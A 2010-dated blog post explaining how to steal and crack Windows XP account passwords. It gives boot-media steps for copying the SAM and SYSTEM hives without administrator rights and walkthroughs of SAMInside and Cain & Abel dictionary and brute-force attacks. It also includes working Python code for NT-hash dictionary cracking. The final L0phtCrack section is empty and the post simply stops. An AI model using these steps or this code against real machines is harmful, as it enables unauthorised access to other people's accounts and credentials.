Friday, August 6, 2010

Hacking passwords by cracking the SAM file in Windows XP

For educational purposes only. Crypto will never be held responsible for any damage that is caused by this information.

Windows does not store passwords as such; it stores password hashes (LM and NT hashes) in the Security Account Manager (SAM) registry hive. To crack them you first need a copy of the SAM hive from the machine whose passwords you want to recover, plus the SYSTEM hive from the same directory, because the SAM is encrypted with a key (the Syskey boot key) derived from SYSTEM.
Both hives live in the following directory if C:\ is your installation drive:
C:\WINDOWS\System32\Config

You might think it would be easy to copy the SAM file by right-clicking on it and choosing copy, but when you do so you will get an error such as "Cannot copy SAM: It is being used by another process".
The hive is held open exclusively by the kernel while Windows is running, so even an Administrator cannot copy the file directly. (An administrator can still export both hives with reg save on HKLM\SAM and HKLM\SYSTEM, or dump the hashes straight from LSASS with a tool such as pwdump, but this article covers the offline route.) Without administrator rights, the only way to copy the SAM is to start the machine in such a way that Windows is not running and the hive is not in use. This can be done in the following two ways:

1. Booting the computer using a Linux boot CD :
First you need a Linux live/boot CD. Search Google for how to make one or click here. Change the BIOS settings so that the computer boots from the CD drive before the hard drive, insert the CD and reboot. If everything worked you will see the machine start in Linux. Mount the Windows partition (read-only is enough; the Linux NTFS driver can read an XP partition), insert removable media such as a USB stick or floppy disk, and copy the SAM file to it. The file copies without complaint because Windows is no longer running on that machine. Be sure to copy the SYSTEM file from the same directory as well: the password hashes in the SAM are encrypted with a key taken from SYSTEM, so the SAM alone is useless.

2. Using an MS-DOS startup/boot disk :
This method doesn't require you to look for any software or use special burning software. Insert a floppy, right-click on it in My Computer, and choose Format. In the dialog that appears, tick "Create an MS-DOS startup disk" and click Start. After you have made the disk, put the floppy in the machine from which you want to get the SAM and restart it with the floppy still inserted. Make sure the BIOS boots from the floppy drive before the hard drive. Caveat: plain MS-DOS can only read FAT/FAT32 partitions. If the XP installation is on NTFS (the default for most XP installs) this method will not see C: at all and you need the Linux CD instead, or a DOS NTFS driver. When the computer boots you should see a screen similar to a command prompt; "A:>" is most likely the prompt you will see. First you need to switch to the C drive (the installation drive). In DOS you do this by typing the drive letter, not cd. Type the following command and hit enter.
C:

Next use the copy command to copy the SAM and SYSTEM files to another area of the hard drive. The command is as follows:
copy C:\WINDOWS\System32\Config\SAM C:\

This copies the SAM file to the root of the C drive. You can save it to any drive or directory you like.
Now copy the SYSTEM file with the following command:
copy C:\WINDOWS\System32\Config\SYSTEM C:\

Next rename the copies so they are not confused with the live hives. Type the following commands:
ren SAM CryptoSAM
ren SYSTEM CryptoSYSTEM

The first command renames your copy of SAM to CryptoSAM, the second renames the SYSTEM copy. Now remove the boot disk, restart the computer and let it boot Windows from the hard drive. Copy CryptoSAM and CryptoSYSTEM from C:\ onto a floppy or any other removable media such as a CD, pen drive or USB stick.
Note : The SYSTEM hive is several megabytes on XP, so it will not fit on a floppy unless you compress it first; a USB stick is much easier.
Windows only opens the hives under System32\Config, so the copies in C:\ are never locked when you log on. Renaming them is not strictly required; it just keeps the copies clearly separate from the originals and makes them easy to find.

So now we have the SAM and SYSTEM files. Let's start cracking. The process is as follows:
First we need to extract the hashes from the SAM file. We use a tool called SAMInside for this.
Install and run SAMInside, go to the File menu and choose the first option, "Import SAM" (or press CTRL+O). A dialog box asks you to point it to the SAM file you wish to crack. If Syskey is enabled (it is by default on XP, so most likely it will be) it then asks for the SYSTEM file too, because the boot key needed to decrypt the SAM is stored there. Browse to both files in SAMInside.
SAMInside does not "crack" Syskey; it simply reads the boot key from SYSTEM and uses it to decrypt the hashes. Once the hashes are shown, export them to a PWDump file using the File menu (one line per account, in the form user:RID:LMhash:NThash:::) and then use L0phtCrack or Cain & Abel to crack the passwords. SAMInside can also crack them itself, but the tools below are more flexible.

For Cain & Abel the procedure is as follows:
Run Cain and go to the "Cracker" tab. Choose "LM & NTLM Hashes" in the left pane, right-click on the grid in the right pane and choose "Add to list." Now choose "Import Hashes from text file or SAM" and click Next. Don't try to import the SAM you copied directly: if the target system was using Syskey, Cain cannot decrypt it without the boot key. Find the PWDump file you created with SAMInside and open it instead. From here it's as easy as holding down Control, left-clicking on the accounts you want to crack, then right-clicking and choosing either "Start Dictionary Attack" or "Start Brute-Force Attack." A dictionary attack uses the text file "c:\Program Files\Cain\Wordlists\Wordlist.txt" to tell it which passwords to try; open that file in Notepad and edit it if you want to add more words. The brute-force method runs through all possible combinations of the characters you configure under the "Brute-Force Options" tab of the "Configure" menu, and can take days depending on the options you choose. Tip: always crack the LM hash first. XP stores it by default for passwords of 14 characters or less, it is case-insensitive and split into two independent 7-character halves, so it falls quickly; the NT hash of the same account then only needs the case of each letter tried. If the LM column shows the fixed value aad3b435b51404eeaad3b435b51404ee, the password is either empty or LM storage was disabled, and you have to attack the NT hash directly. Now all the attacker has to do is wait.
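To show what Cain is doing with the PWDump file behind its dialogs, here is an added example (my own code, not part of the original post or of any tool named above) that parses PWDump lines, computes NT hashes the way Windows does (MD4 over the UTF-16LE password, no salt) and runs a dictionary attack. MD4 is implemented in pure Python because hashlib on OpenSSL 3 often refuses md4. The two PWDump lines and the wordlist are constructed for the example; the LM/NT hash values in them are the real hashes of "password" and of an empty password. LM hashes are not computed here (that needs DES), but the example shows what the LM column gives away before any cracking starts.

```python
"""Added example: dictionary attack on the NT hashes in a PWDump export."""
import struct

MASK = 0xFFFFFFFF
LM_EMPTY_HALF = "aad3b435b51404ee"  # LM hash of one blank 7-character block


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib may lack md4 on OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        saved = list(state)
        for f, order, shifts, k in rounds:
            a, b, c, d = 0, 1, 2, 3          # register indices rotate each step: ABCD, DABC, CDAB, BCDA
            for i, j in enumerate(order):
                state[a] = _rotl((state[a] + f(state[b], state[c], state[d]) + X[j] + k) & MASK,
                                 shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + t) & MASK for s, t in zip(state, saved)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4 over the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str):
    """Yield (user, rid, lm, nt) from PWDump lines of the form user:rid:lm:nt:::"""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, rid, lm, nt = line.split(":")[:4]
        yield user, int(rid), lm.lower(), nt.lower()


def lm_hint(lm: str) -> str:
    """What the LM hash alone reveals, before any cracking is attempted."""
    if lm == LM_EMPTY_HALF * 2:
        return "empty password or LM hashing disabled"
    if lm.endswith(LM_EMPTY_HALF):
        return "password is at most 7 characters"
    return "password is 8 to 14 characters"


def dictionary_attack(pwdump_text: str, wordlist) -> dict:
    """Return {user: password} for every NT hash that matches a wordlist entry."""
    table = {nt_hash(w): w for w in wordlist}  # unsalted, so hash the wordlist once for all users
    return {user: table[nt] for user, _, _, nt in parse_pwdump(pwdump_text) if nt in table}


# Constructed sample input for this example (not from a real machine).
SAMPLE_PWDUMP = """\
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
WORDLIST = ["letmein", "password", "Password1", ""]

if __name__ == "__main__":
    for user, rid, lm, nt in parse_pwdump(SAMPLE_PWDUMP):
        print(f"{user} (RID {rid}): {lm_hint(lm)}")
    print(dictionary_attack(SAMPLE_PWDUMP, WORDLIST))
```

Because the NT hash has no salt, one hash of each candidate word is compared against every account at once, which is why a wordlist attack over a whole SAM costs no more than over a single account, and why precomputed tables work so well against these hashes.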

For l0phtcrack the procedure is:

Hope this helps you.
